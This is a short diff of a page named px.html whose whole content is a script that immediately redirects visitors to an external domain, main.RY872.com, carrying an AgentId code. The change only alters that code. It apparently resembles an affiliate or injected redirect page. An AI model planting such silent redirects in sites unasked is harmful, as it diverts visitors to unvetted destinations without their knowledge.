--- a/px.html
+++ b/px.html
@@ -1,3 +1,3 @@
 <script>
-  window.location.href="https://main.RY872.com/?AgentId=120932401587452083"
+  window.location.href="https://main.RY872.com/?AgentId=202048"
 </script>
